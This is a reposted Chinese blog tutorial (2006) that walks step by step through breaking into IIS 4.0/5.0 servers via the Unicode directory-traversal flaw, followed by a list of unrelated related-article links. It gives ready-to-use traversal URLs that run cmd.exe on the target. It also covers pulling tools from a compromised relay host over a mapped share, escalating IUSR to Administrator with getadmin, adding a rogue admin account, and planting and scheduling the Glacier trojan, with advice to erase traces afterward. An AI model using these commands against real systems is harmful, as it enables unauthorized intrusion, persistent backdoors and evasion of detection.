unicode漏洞利用全攻略

转载 2006年06月12日 19:32:00

by 无用君
  IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在的安全漏洞已经成为了黑客们忠爱的漏洞之一,有希望成为2000年最大的漏洞之一。在此向发现此漏洞的中联绿盟成员袁哥及想出利用映射网络盘方法来解决文件上传问题的l uandao2000致敬。好了,开工吧!

首先是要找到一台带有共享盘的肉鸡,然后将其共享盘映射会本地。找带共享盘的主机不是很难,用国产的黑客软件网络刺客就可以了,在网络刺客中“主机资源”菜单里找“扫描共享主机”,然后填写启始i p和结束ip以后按扫描就,去看会儿电视,再回来看看扫描到没有。没扫描到再换个地址试试,扫描到了的话就可以把他用共享资源菜单中的“影射指定网络盘”把他影射为自己主机的任意一个盘上。
下面的工作就是把工具copy到肉鸡上,假设对方的共享盘为E,ip为127.1.1.2,我们把它影射到了F盘上。现在我们需要copy
自己C盘下的gasys.dll、cmd.exe和getadmin.exe到对方的E盘下,可以到DOS下输入:
C:/"gt;copy c:/gasys.dll F:/

C:/"gt;copy c:/cmd.exe F:/

C:/"gt;copy c:/getadmin.exe F:/

至此为止,肉鸡已经搞定了。现在我们要象主目标进行攻击了。假设对方网站的ip是127.1.1.1,先要把cmd.exe复制到scripts的目录下面,并且要改名,假设对方的物理盘为E : http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy e:/winnt/system32/cmd.exe e:/inetpub/scripts/hackercn .exe
这样我们就已经把cmd.exe复制到了scripts的目录下,并改名为hackercn.exe。现在我们要用它把我们肉鸡上的E盘影射为这个网站服务器上的Y 盘: http://127.1.1.1/scripts/hackercn.exe?/c net use Y: //127.1.1.2/E
然后把我们copy过去的那3个文件再copy到网站服务器上(cmd.exe虽然刚才已经copy过去了,但因为改了名,所以还要再copy一次): http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy Y:/gasys.dll d:/inetpub/scripts/gasys.dll http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy Y:/cmd.exe d:/inetpub/scripts/cmd.exe http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy Y:/getadmin.exe d:/inetpub/scripts/getadmin.exe

好了,现在我们需要把“IUSR_计算机名”这个帐号升级为Administrator(并不是每个站点都有“IUSR_计算机名”这个帐号)。假设这台计算机名为“S ERVERS”,那么我们可以这样做: http://127.1.1.1/scripts/getadmin.exe?IUSR_SERVERS
这样所有的访问者都有了Administrator限权,然后我们再来新建一个用户名为hacker密码为password的用户: http://127.1.1.1/cgi-bin/cmd.exe?/c c:/winnt/system32/net.exe user hacker password /add
然后再把它授予Administrator限权: http://127.1.1.1/scripts/getadmin.exe?hacker

下来就是进入该系统并制作后门了:
在nt的dos下输入
C:/"gt;net use //127.1.1.1/ipc$ "quot;password"quot; /user:"quot;hacker"quot;
现在你已经登陆到了他的主机上,然后上传木马冰河:
C:/"gt;copy C:/unzipped/newglacier/G_Server.exe //127.1.1.1/admin$/system32
然后用net time来获得对方的时间:
C:/"gt;net time //127.1.1.1
假设对方的时间是5点40,那么我们将在5点43启动冰河程序:
C:/"gt;at //127.1.1.1 05:43 G_Server.exe

这样我们就完整的实现了一次入侵,别忘了最后要打扫战场。用冰河删除我们上传过的东西。在“开始”菜单中的“程序”菜单里用“管理工具”中“域用户管理器”的“菜单用户”里选“选择域”,然后输入/ /127.1.1.1,然后还原我们做过手脚的用户。

剩下的事就可以用我们植入的冰河来干了。当然,不见得总会那么走运,在入侵中还会碰到最开始copy文件限权不够等等问题,这就需要大家开动脑筋来解决了。祝各位好运!

相关文章推荐

UNICODE漏洞原理及攻击说明

 漏洞描述:    微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代"/"和"/"而能利用"../"目录遍历的漏洞。未经授权的用户可能利用IUSR_machinename账号的上下文空间...
  • snlei
  • snlei
  • 2009年07月24日 22:30
  • 4202

Perl Unicode全攻略

转载:http://www.cnblogs.com/starspace/archive/2008/12/10.html耐心看完本文,相信你今后在unicode处理上不会再有什么问题。本文内容适用于pe...

利用github创建博客,全攻略

2017............已经添加红色字备注 说明: 首先,你需要注册一个 github 账号,最好取一个有意义的名字,比如姓名全拼,昵称全拼,如果被占用,可以加上有意义的数字. 本文中假设...
  • avi9111
  • avi9111
  • 2017年06月07日 16:32
  • 315

Win7下利用IIS自建网站全攻略!包括ASP和ASP.NET动态网站!高手勿入

Win7下利用IIS自建网站全攻略!包括ASP和ASP.NET动态网站!高手勿入 http://www.wyjexplorer.cn/Blog/View/F06CA17530CCC60B.html ...
  • wlanye
  • wlanye
  • 2012年02月15日 14:02
  • 1732

vue axios全攻略

不再继续维护vue-resource,并推荐大家使用 axios 开始,axios 被越来越多的人所了解。本来想在网上找找详细攻略,突然发现,axios 的官方文档本身就非常详细!!有这个还要什么自行...

在AWS EC2云主机上搭建pptpd协议的VPN服务器,图文详解全攻略

注册账号 登陆aws网站: https://aws.amazon.com/cn/ 点击创建免费账户 创建云主机 选择rhel7.2版本 监听1723端口 下载私钥 连接云主机windo...

Android Studio打包全攻略---从入门到精通

原网址:http://www.2cto.com/kf/201606/517300.html 初出茅庐 手动打包 怎么手动打包 项目写完了,现在需要把应用上传到市场,问题出现—怎么把代码变...

Linuxmint 19全攻略:网络连接篇

强烈关注 薄荷开源网 http://www.mintos.org/newbie/mint13-network.html  一个不错的网站   常见的网络连接方式有:有线、无线网卡、移动网卡...

Linux一键安装web环境全攻略(阿里云服务器)

之前每次配置web环境都是百度找度娘,然后一个一个看,发现都太啰嗦了,找的人也累,所以今天自己整理了一份,也便于以后自己参考 这里用的是阿里云服务器centos 安装说明 1、首先到阿里云市场搜“L...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:unicode漏洞利用全攻略
举报原因:
原因补充:

(最多只允许输入30个字)